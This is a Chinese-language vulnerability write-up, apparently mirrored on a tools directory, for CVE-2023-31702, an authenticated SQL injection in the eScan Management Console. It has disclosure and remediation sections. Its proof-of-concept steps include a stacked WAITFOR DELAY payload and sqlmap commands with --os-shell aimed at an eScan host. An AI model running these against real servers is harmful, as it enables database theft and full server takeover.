Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-31702 — CVE-2023-31702 是 MicroWorld Technologies eScan 管理控制台 14.0.1400.2281 版本中发现的一个已认证 SQL 注入漏洞。 | Kitploit
工具/GitHubGitHub/sahiloj/cve-2023-31702
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育数据库安全
GitHubsahiloj/cve-2023-31702

CVE-2023-31702

CVE-2023-31702 是 MicroWorld Technologies eScan 管理控制台 14.0.1400.2281 版本中发现的一个已认证 SQL 注入漏洞。

查看仓库
2116个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-31702 — eScan 管理控制台 SQL 注入(需认证)

CVE Severity Type Auth


概述

CVE-2023-31702 是发现于 MicroWorld Technologies eScan 管理控制台 14.0.1400.2281 版本中的一个经过身份验证的 SQL 注入漏洞。该漏洞存在于 GetUserCurrentPwd 端点中,UsrId 参数未经适当的清理或参数化,直接被传入 SQL 查询。经过身份验证的攻击者可以利用此漏洞执行 基于时间的盲 SQL 注入,提取整个后端数据库,并最终在底层 Microsoft SQL Server 上获得 交互式操作系统命令 shell,从而导致系统完全沦陷。


漏洞详情

字段详情
CVE IDCVE-2023-31702
漏洞类型SQL 注入(基于时间的盲注 / 堆叠查询)
受影响产品MicroWorld Technologies eScan 管理控制台
受影响版本14.0.1400.2281
存在漏洞的端点/ewconsole/ewconsole.dll/GetUserCurrentPwd
存在漏洞的参数UsrId
认证要求是(需要有效的控制台凭据)
测试环境Windows
CVSS v3.1 评分8.8(高危)
CVSS 向量AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
报告日期2023 年 5 月 16 日
作者Sahil Ojha

受影响软件


漏洞描述

eScan 管理控制台提供了一个基于 Web 的界面,用于管理组织网络中的端点安全。 "查看用户资料" 功能暴露了一个类似 REST 的端点:

root@kitploit:~
/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=<ID>&cnt=<计数器>

UsrId 参数未经验证、转义或使用参数化查询,直接被合并到后端 SQL 查询中。这允许经过身份验证的攻击者将任意 SQL 语句注入到查询中,从而导致:

  • 基于时间的盲 SQL 注入 —— 使用 WAITFOR DELAY 确认可利用性。
  • 堆叠查询执行 —— 允许多语句注入载荷。
  • 完整数据库转储 —— 提取 SQL Server 后端中的所有表、用户、凭据和敏感数据。
  • 操作系统命令执行 —— 利用 SQL Server 的 xp_cmdshell 存储过程(通过 sp_configure 启用),以 SQL Server 服务账户的权限在服务器上执行任意操作系统命令。

影响

成功利用此漏洞后,攻击者可以:

  • 🔴 转储整个 SQL Server 数据库,包括用户凭据、配置数据和敏感企业信息。
  • 🔴 在托管 SQL Server 实例的 Windows 服务器上获得交互式操作系统 shell。
  • 🔴 执行任意操作系统命令(例如,创建后门账户、窃取数据、横向移动到内部网络资源)。
  • 🔴 完全控制 eScan 管理服务器,并可能控制其管理的所有端点。

⚠️ 注意: 攻击者必须先获得有效的 eScan 管理控制台凭据。然而,一旦通过身份验证,利用过程简单直接,不需要提升控制台权限。


概念验证

步骤 1 — 访问存在漏洞的端点

通过身份验证登录 eScan 管理控制台后,导航至以下 URL:

root@kitploit:~
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493

这将返回当前用户资料数据,确认端点可访问。

存在漏洞的端点


步骤 2 — 使用基于时间的 payload 确认 SQL 注入

在 UsrId 参数中注入以下时间延迟 payload:

root@kitploit:~
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176

Payload 解析:

  • ; — 终止原始 SQL 语句并开始一条新语句(堆叠查询)。
  • WAITFOR DELAY '0:0:5' — 指示 SQL Server 暂停 5 秒后再响应。
  • -- — 注释掉原始查询的剩余部分,以防止语法错误。

如果服务器响应延迟约 5 秒,则确认存在注入。

基于时间的注入已确认


步骤 3 — 使用 SQLMap 转储数据库

一旦确认存在盲 SQL 注入,即可使用 SQLMap 提取完整数据库:

root@kitploit:~
sqlmap -u "https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493" \
  --cookie="<session_cookie>" \
  --dbms=mssql \
  --dbs \
  --batch

这将枚举后端 SQL Server 上托管的所有数据库。


步骤 4 — 通过 SQLMap 获取操作系统 shell

SQLMap 还可以通过启用并利用 xp_cmdshell 将攻击升级到操作系统级命令执行:

root@kitploit:~
sqlmap -u "https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493" \
  --cookie="<session_cookie>" \
  --dbms=mssql \
  --os-shell \
  --batch

这将在 SQL Server 主机上建立一个交互式操作系统 shell。

通过 SQLMap 获取 OS Shell


步骤 5 — 在服务器上执行操作系统命令

建立 OS shell 后,可以在服务器上执行任意 Windows 命令:

执行操作系统命令


修复建议

强烈建议采取以下措施来修复和缓解此漏洞:

  1. 使用参数化查询 / 预处理语句 —— 切勿将用户提供的输入直接拼接到 SQL 查询中。使用绑定参数将数据与查询逻辑分离。

  2. 输入验证与净化 —— 在服务端严格验证所有用户提供的参数。对于像 UsrId 这样的数字标识符,应强制仅接受整数输入,并拒绝任何包含特殊字符的值。

  3. 应用供应商补丁 —— 将 eScan 管理控制台更新到最新可用版本。联系 MicroWorld Technologies 支持或参考其安全公告以获取最新的修补版本。

  4. 数据库账户最小权限原则 —— 应用程序数据库账户应仅拥有所需的最低权限。它不应具有 sysadmin 或 db_owner 角色,并且应禁用 xp_cmdshell。

  5. 禁用 xp_cmdshell —— 除非明确需要,否则在 SQL Server 实例上禁用 xp_cmdshell 扩展存储过程:

    root@kitploit:~
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    
  6. Web 应用防火墙 (WAF) —— 部署 WAF 以检测并阻止常见的 SQL 注入模式,作为纵深防御措施。

  7. 网络分段 —— 将 eScan 管理控制台的访问限制在受信任的 IP 范围内,并确保 SQL Server 不直接暴露在互联网上。


披露时间线

日期事件
2023 年 5 月 16 日由 Sahil Ojha 发现并报告该漏洞
2023 年 5 月MITRE 分配 CVE-2023-31702
2023 年 5 月公开披露

参考资料

  • NVD — CVE-2023-31702 (请查看 NVD 以获取当前发布状态)
  • MITRE — CVE-2023-31702 (请查看 MITRE 以获取当前发布状态)
  • MicroWorld Technologies eScan
  • SQLMap — 自动 SQL 注入工具
  • OWASP — SQL 注入
  • CWE-89 — SQL 命令中特殊元素的净化不当

作者

Sahil Ojha — 安全研究员

本披露仅用于教育和安全研究目的。在未获得明确书面授权的情况下,针对系统利用此漏洞是非法且不道德的。

下载工具
字段详情
供应商MicroWorld Technologies
产品eScan 管理控制台
供应商主页https://www.escanav.com
软件链接https://cl.escanav.com/ewconsole.dll
平台Windows